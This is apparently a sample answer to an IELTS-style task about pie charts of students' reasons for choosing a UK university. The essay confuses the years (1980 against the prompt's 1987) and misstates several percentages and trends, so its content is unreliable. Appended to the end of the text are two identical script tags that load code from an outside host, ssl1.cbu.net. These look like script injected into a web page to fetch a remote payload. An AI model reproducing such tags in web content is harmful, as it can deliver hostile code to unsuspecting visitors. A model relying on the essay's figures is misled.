The pie chart below shows the main reasons why students chose to study at a particular UK university in 1987 and 2007. Summarise the information by selecting and reporting the main features, and make a comparison where relevant.
The pie chart gives information about the reasons that students chose universities in the UK between 1980 and 2007.
Overall, from the pie chart, it can be seen that having the right degree course is always critical. And the distance from school to their home is the second reason to be concerned even though it was not in 1980.
In 1980, the rate of suitable degree courses slightly increased from 35% to 37%. It was the percentage of people who engaged in good sports and social activities that led to little attention in 2007 and the third reason in 1980.
However, there is a big change in the percentage of children living close to their parents, from 10% in 1980 to 22% in 2007. And the rate of affecting teaching quality went up in 2007 but only 3% compared with 15% in 1980. In contrast to the previous two decisions before, the percentage of quality of facilities was decreased from 21% to 17%. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
